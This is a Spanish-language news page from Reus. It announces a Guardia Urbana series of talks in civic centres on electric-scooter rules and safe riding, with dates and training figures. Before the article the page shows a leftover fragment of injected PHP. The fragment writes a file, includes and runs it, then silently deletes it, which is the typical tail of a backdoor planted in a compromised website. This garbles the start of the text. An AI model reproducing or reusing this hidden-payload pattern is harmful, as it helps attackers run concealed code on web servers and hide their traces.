");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> La Guardia Urbana organiza un ciclo de charlas sobre normativa y conducción de patinetes eléctricos en los centros cívicos
Iconos cabecera

Destacamos

  • SEM 2021SEM 2021
    Semana Europea de la Movilida 2021

La Guardia Urbana organiza un ciclo de charlas sobre normativa y conducción de patinetes eléctricos en los centros cívicos (09/08/2021)

La Guardia Urbana de Reus continúa ampliando la oferta formativa relativa a la normativa y conducción de VMP (patinete eléctrico) con la organización este otoño de un ciclo de charlas en los centros cívicos de la ciudad.

El calendario de charlas, dirigidas a la ciudadanía en general, se incluye en la programación habitual de los centros cívicos del próximo curso 2021/2022. La programación será la siguiente:

- CC Ponent. 19 de octubre a las 17:30 horas
- CC Del Carmen. 26 de octubre a las 9.30 horas
- CC Migjorn. 4 de noviembre a las 10.00 horas
- CC Mas Abelló. 9 de noviembre a las 17.00 horas
- CC Mestral. 25 de noviembre y 2 de diciembre a las 19.00 horas

Formación y sanción

Ante el incremento del uso de patinetes eléctricos, y el crecimiento número de accidentes de tráfico con este tipo de vehículos, el Ayuntamiento de Reus y, concretamente, desde la Guardia Urbana, se trabaja en dos líneas específicas para reducir la siniestralidad: la formación y la sanción.

Desde hace dos cursos, la Guardia Urbana realiza charlas en los institutos para formar a los jóvenes de la ciudad sobre cómo circular de manera segura con vehículos de movilidad personal. Este último curso, la Guardia Urbana ha dado continuidad a aquellas sesiones teóricas con talleres prácticos que se han desarrollado en el Parque Infantil de Tráfico. Una formación que tendrá continuidad este próximo curso 2021/2022 ya que la totalidad de los centros participantes ha manifestado su intención de seguir participando de la actividad.

En total, durante estos dos años, se han formado más de 1.000 personas en los sesiones teóricas y prácticas sobre el uso correcto del patinete eléctrico en la vía pública.

La concejala de Seguridad Ciudadana, Convivencia y Civismo, Dolores Vázquez, valora de forma positiva la colaboración con los centros cívicos "para potenciar el conocimiento de la normativa y la concienciación ciudadana con estas charlas, dirigidas a la ciudadanía en general". "La educación vial es una herramienta primordial para la prevención de accidentes".

Fuente: Ayuntamiento de Reus

La Guardia Urbana organiza un ciclo de charlas sobre normativa y conducción de patinetes eléctricos en los centros cívicos

[Volver a Noticias]

 
Calle de Anselm Clavé, 1 43004 - Tarragona